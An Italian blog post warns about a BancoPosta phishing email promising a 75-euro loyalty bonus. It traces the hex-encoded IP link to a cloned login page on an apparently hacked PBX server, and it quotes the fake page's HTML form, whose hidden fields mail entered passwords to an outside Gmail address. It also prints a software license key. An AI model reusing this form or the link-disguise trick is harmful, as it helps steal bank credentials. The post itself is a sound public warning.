phishing banco posta, un premio fedelta’ da 75 euro

Fate attenzione mi è arrivata una email con un tentativo di phising che cerca di ottenere le credenziali dell’ account Bancoposta (che peraltro non ho)…

La mail si presenta come spedita da Bancoposta@poste.it ed è scritta con in italiano corretto (niente traduttori online) ed il link

“Accedi ai Servizi online per accreditare il bonus fedeltà” punta al seguente indirizzo:

http://0x51.0xd0.0x25.0x16/poste/index.htm (IP: 81.208.37.22)

che ovviamente non è di poste italiane ma porta su una pagina che potrebbe ingannare in quanto è identica alla pagina ufficiale…

se malauguratamente inseriste la paasword sembra che questa verrebbe inviata via mail a demolatoru88@gmail.com attraverso:

http://www2.fiberbit.net/form/mailto.cgi

usando il seguende form:

<FORM name=Login onsubmit="javascript: return logintest(this);" action=http://www2.fiberbit.net/form/mailto.cgi 

method=post encType=x-www-form-urlencoded><INPUT type=hidden 

value=roma name=Mail_From> <INPUT type=hidden 

value=demolatoru88@gmail.com name=Mail_To> <INPUT type=hidden 

value="diroma" name=Mail_Subject> <INPUT type=hidden 

value=http://www.poste.it name=Next_Page>

il dominio www2.fiberbit.net risulta al seguente IP 210.224.177.131

se andiamo su http://0x51.0xd0.0x25.0x16/ (81.208.37.22) troviamo

e dalle info della pagina risulta il pannelo di admin del software Skip2PBX v.2.1.0 della Idealia Group s.r.l. (http://www.idealiagroup.com/) con

licenza E0B10-A6DBA-3A082-CC9BC-A6753 (forse idealia sa di chi è e farebbe bene ad avvisare il suo cliente che gli hanno hackerato il pbx)

invece l’ip 81.208.37.22 secondo http://www.dnswatch.info/dns/dnslookup?la=en&host=+81.208.37.22&type=A&submit=Resolve alle ore 17.46 risolve in

81-208-37-22.ip.fastwebnet.it

Mi raccomando cestinatela o segnalatela  come phishing…  e se avete bancoposta andate a leggere la loro guida anti-phising